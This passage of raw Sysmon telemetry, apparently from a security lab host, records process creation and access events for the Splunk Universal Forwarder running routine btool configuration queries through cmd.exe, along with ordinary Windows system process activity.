Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.812{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000008024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-64EA-6064-C900-00000000AE01}51805204C:\Windows\system32\cmd.exe{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.804{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000008016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.799{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000008008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.766{266CAFBE-64EA-6064-C800-00000000AE01}46324612C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-64EA-6064-C700-00000000AE01}70367040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.489{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000007999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C700-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.470{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 